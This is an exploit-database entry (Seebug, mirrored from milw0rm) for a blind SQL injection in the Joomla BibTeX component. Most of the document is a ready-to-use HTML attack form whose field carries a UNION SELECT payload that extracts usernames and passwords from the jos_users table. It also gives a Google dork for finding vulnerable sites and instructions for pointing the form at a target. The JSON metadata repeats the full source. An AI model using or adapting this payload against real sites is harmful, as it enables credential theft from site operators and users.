ID SSV:64853
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00
Description
No description provided by source.
<html>
<head>
<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>
</head>
<body>
<!-- # Title : Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->
<!-- # Author : ajann -->
<!-- # Contact : :( -->
<!-- # S.Page : http://www.everythingthatiknowabout.com -->
<!-- # $$ : Free -->
<!-- # Dork : inurl:index.php?option=com_jombib -->
<!-- # DorkEx : http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->
<!-- # .. -->
<!-- # TURKEY -->
<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->
<form action="...." method="post" name="adminForm">
<table>
<tr>
<td valign="bottom">
Autore
<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>
<td valign="bottom">
Titolo
<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />
</td>
<td valign="bottom">
<input type="submit" value="Direct Submit"/>
</td>
<td valign="bottom">
Ordina
<select name="order" class="inputbox" size="1" onchange="document.adminForm.submit();">
<option value="ryear" selected="selected">Date desc</option>
<option value="year">Date asc</option>
<option value="title">Title asc</option>
<option value="rtitle">Title desc</option>
<option value="author">Author asc</option>
<option value="rauthor">Author desc</option>
<option value="journal">Journal asc</option>
<option value="rjournal">Journal desc</option>
<option value="type">Type</option>
</select>
</td >
<td nowrap="nowrap" valign="bottom">
Mostra
<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&&order=ryear&limit=' + this.options[selectedIndex].value + '&limitstart=0';">
<option value="5">5</option>
<option value="10">10</option>
<option value="15">15</option>
<option value="20">20</option>
<option value="25">25</option>
<option value="30">30</option>
<option value="50" selected="selected">50</option>
</select>
</td>
</tr>
</table>
<input type="hidden" name="option" value="com_jombib" />
<input type="hidden" name="catid" value="$catId" />
</form>
</body>
</html>
# milw0rm.com [2007-08-23]
{"lastseen": "2017-11-19T14:43:09", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "_object_type": "robots.models.seebug.SeebugBulletin", "status": "cve,poc", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2017-11-19T14:43:09"}, "dependencies": {"references": [], "modified": "2017-11-19T14:43:09"}, "vulnersScore": -0.3}, "href": "https://www.seebug.org/vuldb/ssvid-64853", "references": [], "history": [], "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "id": "SSV:64853", "title": "Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 4, "sourceData": "\n <html>\r\n<head>\r\n<title>Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability</title>\r\n</head>\r\n<body>\r\n\r\n<!-- # Title : Joomla Component BibTeX <= 1.3 Remote Blind SQL Injection Vulnerability -->\r\n<!-- # Author : ajann -->\r\n<!-- # Contact : :( -->\r\n<!-- # S.Page : http://www.everythingthatiknowabout.com -->\r\n<!-- # $$ : Free -->\r\n<!-- # Dork : inurl:index.php?option=com_jombib -->\r\n<!-- # DorkEx : http://www.google.com.tr/search?q=inurl:index.php%3Foption%3Dcom_jombib&hl=tr&start=0&sa=N -->\r\n<!-- # .. -->\r\n<!-- # TURKEY -->\r\n\r\n<!-- # Note: Pls Edit [form action=] and Direct Submit // form action example: xx.xx/path/index.php?option=com_jombib-->\r\n\r\n\r\n\r\n\r\n<form action="...." method="post" name="adminForm">\r\n\r\n\t\t\t\t<table>\r\n\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t<td valign="bottom">\r\n\t\t\t\t\t\t\t\tAutore\r\n\t\t\t\t\t\t\t\t<input type="text" name="afilter" value="abcdefg' union select 111,222,333,444,555,1,1,1,1,1,2,3,4,5,6,1,2,3,4,5,3,concat(char(117,115,101,114,110,97,109,101,58),username,char(32,112,97,115,115,119,111,114,100,58),password),5,4,2,2,2,2,2,0,0,0 from jos_users/*" class="inputbox" onchange="document.adminForm.submit();" size="20" />\r\n\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t<td valign="bottom">\r\n\t\t\t\t\t\t\t\tTitolo\r\n\t\t\t\t\t\t\t\t<input type="text" name="filter" value="" class="inputbox" onchange="document.adminForm.submit();" size="20" />\r\n\t\t\t\t\t\t\t</td>\r\n\r\n\t\t\t\t\t\t\t<td valign="bottom">\r\n\t\t\t\t\t\t\t\t<input type="submit" value="Direct Submit"/>\r\n\t\t\t\t\t\t\t</td>\r\n\t\t\t\t\t\t\t<td valign="bottom">\r\n\t\t\t\t\t\t\t\t Ordina \r\n<select name="order" class="inputbox" size="1" onchange="document.adminForm.submit();">\r\n\t<option value="ryear" selected="selected">Date desc</option>\r\n\t<option value="year">Date asc</option>\r\n\r\n\t<option value="title">Title asc</option>\r\n\t<option value="rtitle">Title desc</option>\r\n\t<option value="author">Author asc</option>\r\n\t<option value="rauthor">Author desc</option>\r\n\t<option value="journal">Journal asc</option>\r\n\t<option value="rjournal">Journal desc</option>\r\n\r\n\t<option value="type">Type</option>\r\n</select>\r\n\t\t\t\t\t\t\t</td >\r\n\t\t\t\t\t\t\t<td nowrap="nowrap" valign="bottom">\r\n\t\t\t\t\t\t\t\t Mostra \r\n<select name="limit" class="inputbox" size="1" onchange="document.location.href='http://www.gruppofrattura.it/index.php?option=com_jombib&&order=ryear&limit=' + this.options[selectedIndex].value + '&limitstart=0';">\r\n\t<option value="5">5</option>\r\n\t<option value="10">10</option>\r\n\r\n\t<option value="15">15</option>\r\n\t<option value="20">20</option>\r\n\t<option value="25">25</option>\r\n\t<option value="30">30</option>\r\n\t<option value="50" selected="selected">50</option>\r\n</select>\r\n\t\t\t\t\t\t\t</td>\r\n\r\n\t\t\t\t\t</tr>\r\n\t\t\t\t</table>\r\n\r\n\r\n\t\t<input type="hidden" name="option" value="com_jombib" />\r\n\t\t<input type="hidden" name="catid" value="$catId" />\r\n\t\t</form>\r\n\r\n</body>\r\n</html>\r\n\r\n# milw0rm.com [2007-08-23]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-64853", "type": "seebug", "objectVersion": "1.4"}
{}